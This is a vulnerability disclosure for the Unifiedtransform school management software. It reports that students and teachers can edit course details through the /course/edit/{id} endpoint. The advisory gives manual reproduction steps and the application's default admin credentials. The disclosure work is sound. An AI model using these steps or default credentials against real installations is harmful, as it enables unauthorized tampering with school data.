## Description Unifiedtransform v2.X is vulnerable to Incorrect Access Control. Any user (students and teachers) can access and modify course details via the /course/edit/{id} endpoints. This functionality intended exclusively for administrative use. Exploiting this flaw allows unauthorized manipulation of course names and categories, compromising data integrity and administrative controls. Vendor: [Unifiedtransform](https://github.com/changeweb/Unifiedtransform) ## Product A school management Software v2.X --- ## Affected components Access Control Mechanism which is responsible for course permissions. Route: GET /course/edit/{id} Controller: CourseController Method: edit() And all other endpoints and functionalities related to editing course. ## PoC/Attack Vector **Step 1:** Install the application as instructed in the official GitHub repository, and log in using the default admin credentials. (admin@ut.com:password) **Step 2:** Create several courses to populate data. **Step 3:** Log in to the application as a Teacher or Student. **Step 4:** Navigate to the endpoint: /course/edit/{id} where ID starts with 1 with any existing course. suppose if you created 2 courses the ID=1 will be for course 1 and ID=2 will be for course 2 **Step 5:** Change the course name and type and click on update. --- **Vulnerability Type:** Incorrect Access Control **Attack Type:** Remote **Impact:** Escalation of Privileges **Attack Vectors:** Broken Access Control allows teachers or students to modify data of course. **Discoverer:** Sneh Bavarva ## Additional information **Impact:** Unauthorized changes to course information can lead to academic mismanagement and breakdown of curriculum structure. Only administrators should have the authority to modify such sensitive data. **References:** https://github.com/changeweb/Unifiedtransform https://cwe.mitre.org/data/definitions/284.html - [Unifiedtransform Official Site](http://unifiedtransform.com) - [Unifiedtransform GitHub Repository](https://github.com/changeweb/Unifiedtransform)